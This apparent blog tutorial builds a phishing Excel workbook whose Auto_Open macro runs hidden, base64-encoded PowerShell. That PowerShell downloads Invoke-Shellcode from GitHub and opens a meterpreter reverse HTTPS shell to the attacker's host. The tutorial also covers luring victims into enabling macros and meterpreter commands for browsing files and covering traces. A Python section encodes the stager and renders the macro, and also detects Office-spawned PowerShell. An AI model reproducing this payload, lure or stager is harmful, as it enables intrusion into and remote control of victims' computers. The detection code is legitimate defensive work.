Penetration Testing – Excel – The Old Trick – All things in moderation

Penetration Testing – Excel – The Old Trick

After the previous post, I think you have tried some tricks with the Social Engineering Toolkit (SET). Believe me, this tool is worth trying. Today I will show you an old trick of mine that relies on social engineering. Sometimes, once you are inside the victim's network, you can't use ARP poisoning to redirect traffic, so the web-based attacks that depend on it are off the table. At that point you should try injecting a payload into a document and sending it from a fake company mail address. For this example I use an Excel macro. Follow this quick tutorial to get the whole point of it.

  • Firstly, open Excel and put in some funny information like this:


  • Secondly, create a macro named Auto_Open() (Excel runs it automatically when the workbook is opened and macros are enabled) like this:
Sub Auto_Open()
    ' Unhide the lure sheet and switch to it so the victim sees something plausible
    Sheets("Sheet2").Visible = True
    Sheets("Sheet2").Select
    ' Launch PowerShell without a window; -Enc takes the stager as base64 of UTF-16LE text
    Dim strCommand As String
    strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc [Base64Code]"
    Shell strCommand, 0    ' 0 = vbHide, so no console window appears
End Sub

Do you still remember how I created a meterpreter payload that connects back to my host? (If you forgot, you can review it in this post.)
If you remember, you just base64-encode this one-liner. Note that this is encoding, not encryption, and that PowerShell's -Enc switch expects the text as UTF-16LE before base64; a plain base64 of UTF-8 text will not run:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.138 -Lport 443 -Force


And the resulting base64 string is:

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAzADgAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=

Put that string in place of [Base64Code] above and the macro is finished. Then save the file under a lure name such as Hotgirl_Telephone.xls (use the .xls or .xlsm format: a plain .xlsx cannot contain a macro).
You know what I mean. 😀
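Because the -Enc switch trips people up (it wants UTF-16LE, not UTF-8, before base64), here is an added example, written for this edit and not part of the original post, that produces the blob from the one-liner, renders the Auto_Open() macro with it, and also does the defender's job: pull an -Enc blob out of a captured process command line, decode it, and flag PowerShell spawned by an Office application. The event records and file paths are constructed for the example; the one-liner is the page's own.

```python
import base64
import re
from typing import Dict, List

# Added example (not from the original post): the encoding step behind
# "-Enc [Base64Code]" and the reverse operation a defender runs on a captured
# process command line. PowerShell's -EncodedCommand wants base64 of the script
# as UTF-16LE text; base64 of UTF-8 text yields a blob PowerShell cannot run.

# The stager one-liner exactly as it appears on the page (sample input).
ONE_LINER = (
    "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/"
    "PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/"
    "Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https "
    "-Lhost 192.168.10.138 -Lport 443 -Force"
)


def encode_powershell_command(script: str) -> str:
    """Produce the -EncodedCommand form: UTF-16LE bytes, then standard base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Inverse of encode_powershell_command, for triage of a captured blob."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def build_auto_open_macro(encoded: str, lure_sheet: str = "Sheet2") -> str:
    """Render the page's Auto_Open() macro with the blob filled in."""
    return (
        "Sub Auto_Open()\n"
        f'Sheets("{lure_sheet}").Visible = True\n'
        f'Sheets("{lure_sheet}").Select\n'
        "Dim strCommand As String\n"
        f'strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc {encoded}"\n'
        "Shell strCommand, 0\n"
        "End Sub\n"
    )


# -EncodedCommand may be abbreviated; these are the spellings commonly seen in
# command lines. A real blob is plain base64 and never contains '[', so the
# unfilled "[Base64Code]" placeholder does not match.
_ENC_ARG = re.compile(
    r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}


def find_encoded_commands(command_line: str) -> List[str]:
    """Decode every -Enc blob found in a process command line."""
    return [decode_powershell_command(b) for b in _ENC_ARG.findall(command_line)]


def flag_office_spawned_powershell(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return process-creation events where an Office app launched PowerShell,
    each annotated with the decoded script ("" if nothing was encoded).
    The event shape is a constructed simplification of Sysmon event 1 fields."""
    hits = []
    for ev in events:
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        child = ev["Image"].rsplit("\\", 1)[-1].lower()
        if parent in OFFICE_APPS and child in {"powershell.exe", "pwsh.exe"}:
            decoded = find_encoded_commands(ev["CommandLine"])
            hits.append({**ev, "DecodedScript": decoded[0] if decoded else ""})
    return hits


# Constructed sample events: the chain this macro produces plus two that should not fire.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc "
        + encode_powershell_command(ONE_LINER),
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    },
    {
        "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c echo hi",
    },
]

if __name__ == "__main__":
    blob = encode_powershell_command(ONE_LINER)
    print(build_auto_open_macro(blob))
    for hit in flag_office_spawned_powershell(SAMPLE_EVENTS):
        print("ALERT:", hit["ParentImage"], "->", hit["Image"])
        print("  decoded script:", hit["DecodedScript"][:60], "...")
```

Running the script prints the finished macro and one alert, for the Excel-to-PowerShell event. The blob on the page decodes to the same one-liner followed by a newline, which is why it ends in CgA= (UTF-16LE 0x0A 0x00); an encoded command that does not decode cleanly as UTF-16LE is a sign that something other than PowerShell's own convention produced it.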

  • Send this Excel file as a mail attachment. It has one drawback, which you can see in the screenshot: Excel does not run macros by default and shows a security warning instead.

You need your social-engineering skills to persuade the victim to enable macros (click Enable Content) before anything runs.

  • After that, everything is in place. Start your listener on port 443 (a handler for windows/meterpreter/reverse_https, matching the payload and port in the one-liner), and when the victim enables the macro their machine connects back to your host.

We use this command to start interacting with our session:

sessions -i 1

And list the victim's drives:

show_mount


List the files in the current directory:

ls


Or the currently running processes:

ps


Because I am used to the Windows command line, I use this command to drop into a hidden, interactive cmd.exe (-i interacts with the new process, -H hides its window so the victim sees nothing):

execute -f cmd.exe -i -H


Then you can list their files with the dir command:

dir


You could write a note.txt file as a test (you know what I mean here? 😉):

echo recovery sky > note.txt


Check that it appears:

dir


View its content:

type note.txt


Then delete it so nothing is left behind:

del /q /f note.txt


Finally, to leave cmd.exe and return to the meterpreter prompt, type exit:

exit


And send this session to the background:

background


To switch to another session, list them with the sessions command and interact with the one you want by its id, as shown above.

Personally, I think this is enough for you to test the victim's computer, but always keep in mind that we do this for educational purposes only. 😀
